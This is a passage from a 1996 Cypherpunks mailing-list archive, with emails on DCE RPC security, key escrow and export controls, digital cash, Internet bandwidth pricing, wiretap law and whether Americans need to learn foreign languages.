In-Reply-To: <31598E35.1CFB@netscape.com>
Message-ID: <199603271856.NAA03030@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Phil Karlton writes:
> Perry E. Metzger wrote:
> 
> > 2) I strongly hope that Netscape tries to move the product towards
> >    standards based mechanisms like the IETF's RTP protocol, which are
> >    in widespread use, rather than pushing yet more proprietary
> >    systems. Proprietary is bad in this instance.
> 
> Personally, I have some trouble with the work proprietary above.
> 
>     SSL 2 and SSL 3 protocols have been IETF drafts from the beginning.

We aren't talking about SSL, Mr. Karlton. We are talking about RTP
vs. a proprietary audio encapsulation. If you don't know what RTP is,
you to learn before talking about it.

> SSL does depend upon an underlying reliable bytestream. This means it is
> not the best choice for all applications.

Such as internet phone, for example.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Maurizio <100561.744@compuserve.com>
Date: Fri, 29 Mar 1996 07:57:55 +0800
To: "cypherpunks@toad.com>
Subject: unsubscrive
Message-ID: <960327191354_100561.744_EHK55-1@CompuServe.COM>
MIME-Version: 1.0
Content-Type: text/plain


unsubscrive cypherpunks





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: cmca@alpha.c2.org (Chris McAuliffe)
Date: Thu, 28 Mar 1996 13:50:24 +0800
To: Adam Shostack <adam@lighthouse.homeport.org>
Subject: Re: HP & Export of DCE
In-Reply-To: <199603271619.LAA08716@homeport.org>
Message-ID: <199603272239.OAA07314@eternity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

[To: Adam Shostack <adam@lighthouse.homeport.org>]
[cc: perry@piermont.com, cypherpunks@toad.com]
[Subject: Re: HP & Export of DCE ]
[In-reply-to: Your message of Wed, 27 Mar 96 11:18:49 EST.]
             <199603271619.LAA08716@homeport.org> 

Adam Shostack <adam@lighthouse.homeport.org> shaped the electrons to type:
>I wasn't aware there were multiple things masquerading under the name
>Secure RPC.  In any event, does the crypto in DCE stand up to the
>LaMacchia/Odlyzko attacks?  (And did Sun ever upgrade what they ship?)

DCE security (including RPC) is Kerberos based, somewhere between V4 and
V5, and appears to be about as strong as DES lets it be.

Chris McAuliffe <cmca@alpha.c2.org> (No, not that one.)

-----BEGIN PGP SIGNATURE-----
Version: 2.6

iQCVAwUBMVm++YHskC9sh/+lAQE4JgP/dbXJoUnpx/RyiYTvRe6Zrek5j+h5B6QX
nusogJioZdAts2SjEjIOVfEdAtoZ/MGVyn8p750np6UttvUCfFfiCZ7uIydMEQEm
IZAZ1ep3MpyaAKgpGrqyDz47ic/Kk0iit2WwEXjvkN8c+PoXrvKPjkW7ugjHqQgf
4EkPBSlI+f8=
=iZQA
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Thu, 28 Mar 1996 11:53:12 +0800
To: mike@fionn.lbl.gov
Subject: Re: Why Americans feel no compulsion to learn foreign languages
Message-ID: <ad7eeebe21021004e49e@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 8:17 PM 3/27/96, Michael Helm wrote:
>On Mar 27,  3:13am, Timothy C. May wrote:
>> Americans are typically thousands of miles away from those speaking
>> Japanese, Mandarin, Tagalog, Polish, Italian, Dutch, Spanish, Hindi,
>> Talegu, and the hundreds of other languages. It is not at all clear what
>> language Americans should pick as a "second language" to study.
>
>I don't really disagree with the conclusions drawn by this poster, or
>with the quasi-economics argument he makes.  However, I must say that
>the above is completely wrong.  MOST Americans live in large urban
>areas, & as such are within seconds/footsteps of people whose native
>languages are not English (or who don't have a single "native language",
>but several!).  There are probably _hundreds_ of languages spoken in the
>San Francisco Bay Area.  The school districts here routinely report double
>digit languages in the school age population.

And? Your point being?

"All learning is economics," to paraphrase our noted saying about security.

Because there are diverse groups within 100 miles away speaking a babel of
languages, including a per cent or so each of Thai, Talegu, Mandarin,
Vietnamese, and so on, do I understand your point that I should pick one of
these languages and spend a year or so learning it well enough to say to
one of these groups, "Hello, can you tell me which way to the train
station?"

My point is not against the learning of a foreign language, just that
economic considerations _must_ play a role. (Of course, people are free to
ignore economics and "follow their bliss." A friend of mine studied
Sanskrit for several years, and I even spent some time studying some Old
Icelandic a few decades ago.)

My European friends usually study the language of their direct neighbors
and important trading/scientific partners. English, German, French,
typically.

>There are 3 Spanish language channels (& another 2 ... "multiple
>choice") on my tv cable system.  That anglophones choose to tune them
>out, or to not even notice the Noah's ark around them, says something
>about this culture.

"Says something about this culture." Insults aside, you are right. I will
sign up with the local JC for a study of Vietnamese, just so I won't be
ignoring this cornucopia of polyglotism.

(One person communicated with me in private about this, saying that the
international nature of the Internet is an ironic counterpoint to my point.
So I promised this guy I would learn Hindi and Polish to better be able to
use the Internet. Of course, this'll take me a few years, and then I'll no
doubt find that I don't have any interest in talking to the people on the
Net who speak in Hindi or Polish, but, what the hell, I will have reduced
my "anglophone chauvinism quotient.")

--Tim

Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^756839 - 1  | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: frantz@netcom.com (Bill Frantz)
Date: Fri, 29 Mar 1996 04:37:48 +0800
To: cypherpunks@toad.com
Subject: Re: Crypto CD UpDate
Message-ID: <199603272250.OAA16507@netcom9.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


As I said in private mail, I'd spend $US20 for the disk particulary if
included useful archives (like cypherpunks).  I like my own library.

Regards - Bill


------------------------------------------------------------------------
Bill Frantz       | The CDA means  | Periwinkle  --  Computer Consulting
(408)356-8506     | lost jobs and  | 16345 Englewood Ave.
frantz@netcom.com | dead teenagers | Los Gatos, CA 95032, USA






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Fri, 29 Mar 1996 17:12:56 +0800
To: cypherpunks@toad.com
Subject: Re: ITAR double standards?
Message-ID: <ad7ef34a22021004f622@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 5:20 PM 3/27/96, Asgaard wrote:

>I believe in this parallel thesis. As was reported from the dec -95
>OECD meeting in Paris:
>
>>The statement from SHELL International is interesting.
>>They can accept 'a trustworthy international key escrow
>>infrastructure based on X.509 certificates' but they also
>>need to 'protect their assets against Government intelligence
>>gathering, organised crime, civil unrest and data privacy
>>legislation obligations'.

Indeed, there are _many_ reasons for multinational and/or non-U.S.-based
companies to be suspicious of the United States or any of its minions
holding the keys to confidential business information.

Bamford's "The Puzzle Palace" reports on many incidents in which U.S.
agencies intercepted business transactions for various reasons. Even of
allies, as in the case when one of the NSA's SIGINT antennas picked up a
message from the U.K. government to the ambassador in Vienna alerting him
to the coming devaluation of the pound. (A great opportunity for Ollie
North and his covert ops boys to make some extra millions by currency
speculation.)

Likewise, ITT routinely cooperated with the FBI and pre-NSA surveillance
agencies to supply the traffic of corporations and businessmen.

Given that even nominal allies spy on each other (Pollard spied on the U.S.
for Israel, Chobetsu routinely spies on U.S. companies in Japan, France
bugged Air France jets to spy on U.S. businessmen, etc.), I just don't see
any international agreements that protect adequately. And when I say
"nominal allies," consider that many in Washington have been saying in
recent years that Japan is America's "real" enemy! (I certainly don't
endorse this view...they're all a bunch of rascals.)

I believe the obvious flaw in the whole key escrow debate, the flaw that is
so obvious it seldom gets discussed, is that it is expected that the U.S.
will be the holder of keys. Or its minions in Europe and Asia. Flawed,
irretrievably.

--Tim May

Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^756839 - 1  | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hal <hfinney@shell.portal.com>
Date: Fri, 29 Mar 1996 17:19:09 +0800
To: cypherpunks@toad.com
Subject: Re:  What backs up digital money?
Message-ID: <199603272304.PAA26037@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

From: tcmay@got.net (Timothy C. May)
> At 1:46 PM 3/27/96, Scott Schryvers wrote:
> >Question.
> >If e-cash were backed by gold would that make it more reliable than say the
> >dollar?
> 
> This question, and much of the debate that appears here about digital money
> in its many and confusing forms (e-cash, digicash, bitmarks, e$,
> cypherfrancs, chaums, etc.), displays a "type error" in thinking about
> digital money.
> 
> No form of digital money extant is an actual currency in the conventional
> sense. Nor does this seem likely. Nor necessary. Nor useful. Nor important.
> 
> Rather, think in terms of _checks_ or _wire transfers_ and the like. An
> order to transfer funds from one account or place of holding to another.

Tim is right when he goes on to say that digital money is not exactly
like any of the traditional financial instruments.  However I think it is
more like cash, and for that matter more like currency, than like other
things.

Here are some of the ways it is like cash.  It is basically anonymous,
with neither buyer nor seller able to learn the identity of the other,
even with the help of the bank.  It is untraceable; there is no way to
know, given a piece of cash, under which transaction it was withdrawn
from the bank.  It is a bearer instrument; anyone can hold it, and
whomever presents it gets the value (that is, it is not "made out" to a
certain individual).  A piece of dcash is an asset, a claim on the
bank.  When dcash is withdrawn, the bank must debit (reduce) the
customer's account immediately.  Likewise, when it is deposited, the
depositor's account gets credited.  Between those times the net amount
of money in bank accounts was reduced, by exactly the amount of
circulating dcash.  When the money supply is counted, circulating dcash
will need to be included with traditional currencies like cash and
coins (I think that is M1), since it is not counted in the bank
accounts.

The difference with checks and wire transfers is that in those cases
there is a direct transfer of assets from one account to another.  These
are not bearer instruments; in fact wire transfers aren't really
financial instruments at all, and do not carry value.  There is normally
no anonymity or untraceability either, with these kinds of transactions.
So I see them as being very different from dcash.

The best analogy to dcash is the private currency which was issued by
banks and other financial institutions prior to about 1850 (in the US).
Until that time the US government did not issue paper money, it was all
private.  A bank would issue bank notes, which would circulate in its
local area as money.  They were backed up by "real money", specie,
metallic coins, which the bank kept in its vaults.  The digital cash
issued by Mark Twain bank is in many ways a throwback to these old bank
notes.

There are differences, of course.  A lot of attention is focussed on the
non-transferrability, the fact that you have to deposit the cash at the
bank after each transaction.  Some people say that this means that the
cash doesn't circulate, hence is not a currency, hence must be more like
checks, etc.  But I disagree.  I view this aspect of dcash as superficial
and unimportant.  First, it may not be technically necessary.  Some cash
systems have been proposed which allow for transferrability.  But second,
even if it is necessary to exchange cash after each transaction, that can
be done completely automatically.  In fact, the agency which does so
doesn't even have to be the bank, as far as the financial aspects go.
The exchange has no financial impact on the bank's accounting procedures.
And it can be completely automated for users.  They don't even have to be
aware of it.  Their software can turn in received dcash at the bank for
fresh banknotes, anonymously and automatically.

So I view dcash as a circulating currency, where the act of transfer in
some implementations requires some technical assistance from an agent
of the bank able to make digital signatures on its behalf.  It is more
than simply a mechanism for transferring funds from one account to
another (unless you think of government currency in those terms).  I
view it as possessing real value, as being a genuine asset in the same
sense as other forms of cash.

Hal

-----BEGIN PGP SIGNATURE-----
Version: 2.6

iQBVAwUBMVnJehnMLJtOy9MBAQGoxwIAiFRtBo215dXzlRWR1drH8dQR63zKkPoQ
5EDk85YM8fxIaDg/cYrGEzl+bDlF2qOJisjrCl9XkTJEBrifHavrEQ==
=792N
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: frantz@netcom.com (Bill Frantz)
Date: Fri, 29 Mar 1996 17:11:24 +0800
To: cypherpunks@toad.com
Subject: Re: Traffic Jams on the Internet
Message-ID: <199603272304.PAA18133@netcom9.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At  3:54 PM 3/27/96 -0500, Mark M. wrote:
>-----BEGIN PGP SIGNED MESSAGE-----
>
>On Tue, 26 Mar 1996, E. ALLEN SMITH wrote:
>
>>       It occurs to me that it would be good if people sent in some
>> non-governmental/hierarchial solutions to this problem, such as ones using
>> digital cash as "postage" for prioritized mail.
>
>I read an article on various Internet pricing schemes a while ago and one
>of the ideas was a pretty clever solution.  Internet services would be
>classified according to their bandwidth requirement and need for
>interactivity.  The cost per byte of e-mail might be very cheap whereas the
>cost per byte for videoconferencing might be more.  There's no real way to
>rip off this scheme, because if you try to send an e-mail and classify it
>as "high priority" it is more expensive.

The phone companies have dealt with this kind of problem for years.  For
example, there are issues of phase jitter and bit error rate that they deal
with all the time.  If anything, they don't quite understand the email type
communication of, "Oh, anytime in the next 10 minutes, and tell me if it
doesn't get thru and I'll send it again."

In ATM, these characteristics are bundled into what is called Quality of
Service.  That, along with bandwidth, make a reasonable basis for charging.
 Email is a bit like flying standby, while video is more like the Concorde.
 IMHO, the only long-term solution to the problem of bandwidth allocation
involves markets.  Markets feed cost information back to the users and give
the providers incentive to improve service.

Regards - Bill


------------------------------------------------------------------------
Bill Frantz       | The CDA means  | Periwinkle  --  Computer Consulting
(408)356-8506     | lost jobs and  | 16345 Englewood Ave.
frantz@netcom.com | dead teenagers | Los Gatos, CA 95032, USA






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rollo@artvark.com (Rollo Silver)
Date: Fri, 29 Mar 1996 04:38:47 +0800
To: cypherpunks@toad.com
Subject: Randomness paper
Message-ID: <v02130500ad7f61e60406@[198.59.115.163]>
MIME-Version: 1.0
Content-Type: text/plain


Those of you interested in the notion of randomness may want to check out
"On the Effective Definition of 'Random Sequence'", a paper written by
Michael Levin, Marvin Minsky, and me in 1965.

For a paper copy, send a SASE (78 cents worth of stamps) to me:
     Rollo Silver / PO Box 219 / San Cristobal, NM 87564

If anyone can tell me how to post a highly formatted file, with equations,
on the Internet, so that anybody can read it, pls let me know! That would
be preferable to a paper copy -- but I don't know how to do it.

Rollo Silver                | e-mail: rollo@artvark.com                  |
Artvark                     | Home page: http://www.artvark.com/artvark/ |
PO Box 219                  | Voice: 505-586-0197                        |
San Cristobal, NM 87564 USA | Compuserve 71174,1453                      |
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-=-=-=-=-=-=






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: os <os@cs.strath.ac.uk>
Date: Fri, 29 Mar 1996 13:17:47 +0800
To: "Timothy C. May" <tcmay@got.net>
Subject: Re: Why Americans feel no compulsion to learn foreign languages
In-Reply-To: <ad7e4b691902100484d7@[205.199.118.202]>
Message-ID: <31595F37.2781@cs.strath.ac.uk>
MIME-Version: 1.0
Content-Type: text/plain


>There is not a single foreign language I can think of it that would help me
>in my goals or help anyone I know. 

I have never known anyone being disadvantaged by knowing another language than their mother
tongue.

Oyvind
--




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "David K. Merriman" <merriman@arn.net>
Date: Thu, 28 Mar 1996 11:34:44 +0800
To: Charles Bell <quester@eskimo.com>
Subject: Re: Let's *NOT* "Raise their Awareness"
Message-ID: <2.2.32.19960327094237.006943d0@arn.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

At 12:23 AM 03/27/96 -0800, Charles Bell wrote:
>On Tue, 26 Mar 1996, David K. Merriman wrote:
>
>
>Yes, and some years ago a State legislature (I forget which) passed a
>resolution setting the value of pi at exactly 3.  I'm not sure how they
>planned to enforce their will.  Do you know how the Texas judge means to
>enforce his?

Frankly, no. I would suspect some kind of visits from Child Welfare, or
somesuch - fruitless though it may be.

Dave
-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMVjxCsVrTvyYOzAZAQFWfAP7BQTesPRwoK+ubvFxLg36tq634FdFAlue
5sMZO1D2yBfHEHsHyfpR7RBB2DrP8vqTjrcZjz9ctxg7ph5/sqYUWf37xkKbyLu2
byJMWfZhZDXIwDyhWU3RmJOUL+loisDzP7uNZtjoodJLro/QceSR4sqdgWa4xl59
eiPapVoaXdU=
=1+fS
-----END PGP SIGNATURE-----
-------------------------------------------------------------
"Giving money and power to government is like giving 
whiskey and car keys to teenage boys."
                    P. J. O'Rourke (b. 1947), U.S. journalist.
<><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><>
http://www.shellback.com/personal/merriman/index.htm






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shabbir@vtw.org (Shabbir J. Safdar)
Date: Thu, 28 Mar 1996 11:29:16 +0800
To: shamrock@netcom.com (Lucky Green)
Subject: Re: So, what crypto legislation (if any) is necessary?
Message-ID: <199603272043.PAA01837@panix4.panix.com>
MIME-Version: 1.0
Content-Type: text/plain


Lucky Green writes:
>At 2:08 3/26/96, Shabbir J. Safdar wrote:
>
>It is a widespread myth that wiretaps require warrants. Court ordered
>warrants are not required for a wiretap. They have not been required since
>the Digital Telephony Bill passed. 

(see below)

>That the net, the media, and even
>attorneys are so blissfully unaware of this, even years after the provision
>doing away with requiring warrants became law, is one of the finest
>examples of cognitive dissonance you are ever likely to find. It is too
>disturbing to believe it, so the mind ignores the facts.

When everyone in the world seems to disagree with you, isn't it a good
idea to check the facts?

>Excerpt from the Digital Telephony Bill
(deleted)
[..]
>"My supervisor approved it" may well suffice.

Your misunderstanding of how interceptions are done is dangerous to
what is otherwise a rational, intelligent argument.  

Indeed, there are ways to conduct a wiretap without a judge.  They require
dispensations from people like the Attorney General, for example.  And
this is certainly not a normal practice.

There are a lot of reasons to object to DT, but this is not one of them.

-Shabbir J. Safdar * Online Representative * Voters Telecomm. Watch (VTW)
 http://www.vtw.org/ * Defending Your Rights In Cyberspace





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Mark M." <markm@voicenet.com>
Date: Fri, 29 Mar 1996 04:40:57 +0800
To: cypherpunks@toad.com
Subject: Re: Traffic Jams on the Internet
In-Reply-To: <01I2SQ2FUST88ZDZ7I@mbcl.rutgers.edu>
Message-ID: <Pine.LNX.3.92.960327154818.274A-100000@gak>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Tue, 26 Mar 1996, E. ALLEN SMITH wrote:

> 	It occurs to me that it would be good if people sent in some
> non-governmental/hierarchial solutions to this problem, such as ones using
> digital cash as "postage" for prioritized mail.

I read an article on various Internet pricing schemes a while ago and one
of the ideas was a pretty clever solution.  Internet services would be
classified according to their bandwidth requirement and need for
interactivity.  The cost per byte of e-mail might be very cheap whereas the
cost per byte for videoconferencing might be more.  There's no real way to
rip off this scheme, because if you try to send an e-mail and classify it
as "high priority" it is more expensive.

- --Mark

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
markm@voicenet.com              | finger -l for PGP key 0xf9b22ba5
http://www.voicenet.com/~markm/ | bd24d08e3cbb53472054fa56002258d5
"The concept of normalcy is just a conspiracy of the majority" -me

-----BEGIN PGP SIGNATURE-----
Version: 2.6.3
Charset: noconv

iQCVAwUBMVmq47Zc+sv5siulAQEIPwP/UG53An/wt2YzhBsxjFUDCK6eXwnVgPCg
jCCxRCGIKOZXeTUfXxK390+XyZqFnue9TjJU1o5g+zMDqBei8AYCx7q3GV94BdPL
2dBFp4IszlNX+KDQs6XUYHkZP6sIIJZrN8wRA7yOhVQZWguzUPhkX71DkilYw2lO
o1sqOAgsviU=
=RXt3
-----END PGP SIGNATURE-----






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Syed Yusuf <yusuf921@uidaho.edu>
Date: Fri, 29 Mar 1996 04:37:58 +0800
To: cypherpunks@toad.com
Subject: Re: Why Americans feel no compulsion ...
In-Reply-To: <199603272017.MAA09654@fionn.lbl.gov>
Message-ID: <Pine.HPP.3.91.960327161816.29329B-100000@goshawk.csrv.uidaho.edu>
MIME-Version: 1.0
Content-Type: text/plain




If a person who speaks three languages is tri-lingual
If a person who speaks two languages is bi-lingual

What do you call a person who only speaks one language?







---------------------answer follows:

An American.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Howard Melman <melman@osf.org>
Date: Thu, 28 Mar 1996 22:18:01 +0800
To: perry@piermont.com
Subject: Re: HP & Export of DCE
In-Reply-To: <199603271619.LAA08716@homeport.org>
Message-ID: <9603272129.AA03193@absolut.osf.org.osf.org>
MIME-Version: 1.0
Content-Type: text/plain



On Wed Mar 27, 1996, Perry E. Metzger wrote:

> Adam Shostack writes:
> > I wasn't aware there were multiple things masquerading under the name
> > Secure RPC.  In any event, does the crypto in DCE stand up to the
> > LaMacchia/Odlyzko attacks?
> 
> They are attacks against Diffie-Hellman. I don't know if DCE uses D-H
> in a similar manner. The main problem was too small a (fixed) modulus.

It doesn't.  DCE uses Kerberos v5.

Howard

-- 

Howard R. Melman              ___   ___   ___            Voice: 617-621-8989
Open Software Foundation     /  /  /__   /__               Fax: 617-621-2782
11 Cambridge Center         /__/  ___/  /              mailto:melman@osf.org
Cambridge, MA  02142                             http://www.osf.org/~melman/




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Charles Bell <quester@eskimo.com>
Date: Fri, 29 Mar 1996 07:56:06 +0800
To: "Timothy C. May" <tcmay@got.net>
Subject: Re: Why Americans feel no compulsion to learn foreign languages
In-Reply-To: <ad7e4b691902100484d7@[205.199.118.202]>
Message-ID: <Pine.SUN.3.92.960327163249.3411A-100000@eskimo.com>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 27 Mar 1996, Timothy C. May wrote:

>
> There is not a single foreign language I can think of it that would help me
> in my goals or help anyone I know. This is the reality of a world dominated
> by English-speaking persons and in which all technical people learn
> English.
>

I guess you don't know anyone who expects to do extensive business in
China during the 21st Century.

Right now everyone in China who can do so is frantically trying to learn
English, the international language.  But as China lumbers massively back
to its historic place among the world's greatest powers, its deference to
foreign tongues may be expected to decline.

Charles Bell






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Weisman <weisman@osf.org>
Date: Thu, 28 Mar 1996 11:49:17 +0800
To: perry@piermont.com
Subject: Re: HP & Export of DCE
In-Reply-To: <199603271619.LAA08716@homeport.org>
Message-ID: <9603272147.AA19461@oberon.osf.org.osf.org>
MIME-Version: 1.0
Content-Type: text/plain



On Wed Mar 27, 1996, Perry E. Metzger wrote:

    Adam Shostack writes:

    > | Adam Shostack writes:
    > | > Well, if Leahy passes, DCE is exportable.

DCE is exported today, although without the ability to encrypt application
traffic.  Authentication and message integrity are in the export version.

    They are attacks against Diffie-Hellman. I don't know if DCE uses D-H
    in a similar manner. The main problem was too small a (fixed) modulus.
    
DCE RPC uses Kerberos V5 to establish DES session keys.

Dave




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: roy@sendai.cybrspc.mn.org (Roy M. Silvernail)
Date: Fri, 29 Mar 1996 07:58:07 +0800
To: EALLENSMITH@ocelot.Rutgers.EDU (E. ALLEN SMITH)
Subject: Re: Edited Edupage, 24 March 1996
In-Reply-To: <01I2T0RRDGQO8ZDZIP@mbcl.rutgers.edu>
Message-ID: <960327.172831.2j4.rnr.w165w@sendai.cybrspc.mn.org>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

In list.cypherpunks, EALLENSMITH@mbcl.rutgers.edu writes:

> Subj:   Edupage, 24 March 1996

>>NETSCAPE TO GET IN ON THE PHONE-BY-INTERNET ACTION

>         Any possibility that Netscape might build in some form of
> cryptography? I realize ITAR rules would make this problematic, but
> perhaps some sort of out-of-country deal for putting in the hooks
> for PGPhone could be done.

Seems like SSL could work for this.
- -- 
           Roy M. Silvernail     [ ]      roy@cybrspc.mn.org
PGP Public Key fingerprint =  31 86 EC B9 DB 76 A7 54  13 0B 6A 6B CC 09 18 B6
                Key available from pubkey@cybrspc.mn.org

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMVnQGxvikii9febJAQFcxAP/TkEuQ9lPx/USyQjptvmL8FvM+nMvZrn/
m1tS7nYJ7SR7DQWl5uZM8Y+MRPZeDsmqvPNT13auS7QVJYDbM58Jp35khbJ/jdND
hWC/H4h/yyBt/GVoFgByLI/ORletMW5p9dEuVFXAY0BCFuB17yvdhr0UkOcaTPiZ
ciSWevXjh1I=
=L3PH
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Fri, 29 Mar 1996 07:57:02 +0800
To: janzen@idacom.hp.com
Subject: Re: HP & Export of DCE
In-Reply-To: <9603272138.AA03891@sabel.idacom.hp.com>
Message-ID: <199603272233.RAA06214@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Martin Janzen writes:
> The first "RPC" was produced by Sun's Open Network Computing group.

Not even remotely the case -- RPC predates Sun Microsystems by a lot.

> Another "RPC" comes from the Open Software Foundation, who unfortunately
> chose the same acronym for the remote procedure calling mechanism in their
> Distributed Computing Environment (DCE).

I'm not sure its so bad, given that there are at least a dozen RPCs
out there or more.

> In short, it would help to avoid massive confusion if people were more
> specific: refer to "DCE RPC", "ONC RPC" (or "Sun RPC", if you must :),
> or "Microsoft RPC", not just to "RPC".

Probably the case...

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Asgaard <asgaard@sos.sll.se>
Date: Thu, 28 Mar 1996 08:41:47 +0800
To: cypherpunks@toad.com
Subject: Re: Crypto CD UpDate
In-Reply-To: <31592105.23B9@unix.asb.com>
Message-ID: <Pine.HPP.3.91.960327172720.11135C-100000@cor.sos.sll.se>
MIME-Version: 1.0
Content-Type: text/plain



> A nice advantage of CD-ROMs is that many BBSs that aren't plugged into
> the net use them. I rememebr showing threads about a similar C'punks

Suppose strong crypto is outlawed in all OECD countries by dec -96.
The known international sites with more or less complete coverage
today amount to a handful. They will be shut down pronto. Of course
lots of private persons have a lot of crypto files hanging around,
but a widely distributed CD-ROM, easily put up as a BBS partition,
wouldn't make the situation worse.

Asgaard





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Asgaard <asgaard@sos.sll.se>
Date: Fri, 29 Mar 1996 08:00:10 +0800
To: cypherpunks@toad.com
Subject: Re: <languages>
Message-ID: <Pine.HPP.3.91.960327173713.11135E-100000@cor.sos.sll.se>
MIME-Version: 1.0
Content-Type: text/plain


I agree that for a native English/American speaker to learn
other languages is mostly a waste of time (if you are not
a spy; or businessman having to deal with constipated French
etc). Only if you permanently move to another country the
situation gradually becomes different. Americans who move
to Sweden (we had a lot of Vietnam war 'deserters' coming
way back) can keep on speaking American for a year or so
without anyone taking notice (actually if the American tries
to speek Swedish the Swedes may deny him to do so, they
love to train themselves in speaking English), but then when
years pass bye and the American still loves the special
attention he receives as an American-speaker and refuses
to learn Swedish, the situation will become awkward.

I studied German, French, Italian and Russian and am still
moderately fluent in German, but I care less and less to
keep these languages up since English is more and more
becoming the World Language.


Asgaard




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: deven@ties.org (Deven T. Corzine)
Date: Thu, 28 Mar 1996 14:35:43 +0800
To: jim bell <jimbell@pacifier.com>
Subject: National speed limits and expansion of federal power...
In-Reply-To: <m0u1pwx-000915C@pacifier.com>
Message-ID: <199603272306.SAA13695@escher.ties.org>
MIME-Version: 1.0
Content-Type: text/plain


At 11:47 PM 3/26/96, Jim Bell wrote:
>They just recently repealed the national 55 MPH speed limit.  Even though it
>was repealed by law, in the same way it was passed, plenty of people have
>argued that the Federal government has no jurisdiction in this area.  Those
>arguments are absolutely valid, even if they were ignored.  The danger in
>giving the government implicit authority in areas not mentioned in the
>Constitution is that it is not clear how far such justification extends.

Actually, the national government didn't even *pretend* it had jurisdiction
here.  Instead, they used an indirect approach -- they passed laws which
denied some of the existing highway funding to states with higher speed
limits than 55 MPH.  (Later this limit was raised to 65 MPH, given some
additional restrictions such as proximity to population centers.)

Any and all states were perfectly free (in theory) to ignore this "national
speed limit" and set any limit or no limit at all.  In practice, no states
exercised this hypothetical freedom, because they had already grown dependent
on highway funds provided by the national government.  Thus, through indirect
pressure exerted through the funding mechanisms, the national government was
able to usurp perogatives which were clearly in the domain of the states.

The national government has expanded greatly in size and powers in times of
war and national crisis.  In particular, FDR spearheaded the massive growth
of the national government in response to the Great Depression, and it has
continued to grow ever since.  More and more often, the national government
usurps traditional state's roles, even in situations of unquestionable state
jurisdiction such as national speed limits.  The elastic clause was one key
tool used for this expansion.

Another key tool is the commerce clause, which has been seriously abused to
secure new powers for the national government.  I don't think I'll go into it
right now...

>If the government can limit us to 55, then why can't they limit us to 40-bit
>keys?

The national government didn't impose 55 MPH speed limits on us, the states
did it under national pressure.  As for whether they can legitimately limit
cryptography use and technology, we don't have any clear answer yet, in any
legal precedent.  Of course, most of us hold the opinion that cryptography
should be considered Constitutionally protected as free speech, but politics
get involved when these things get decided...

Deven




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Asgaard <asgaard@sos.sll.se>
Date: Thu, 28 Mar 1996 08:30:14 +0800
To: cypherpunks@toad.com
Subject: Re: ITAR double standards?
In-Reply-To: <v02110113ad7de267a933@[194.125.43.26]>
Message-ID: <Pine.HPP.3.91.960327175637.11135F-100000@cor.sos.sll.se>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 27 Mar 1996, Richard K. Moore wrote:

> velocity from terrestial anachronisms.  While Barlow's critics, it seems,
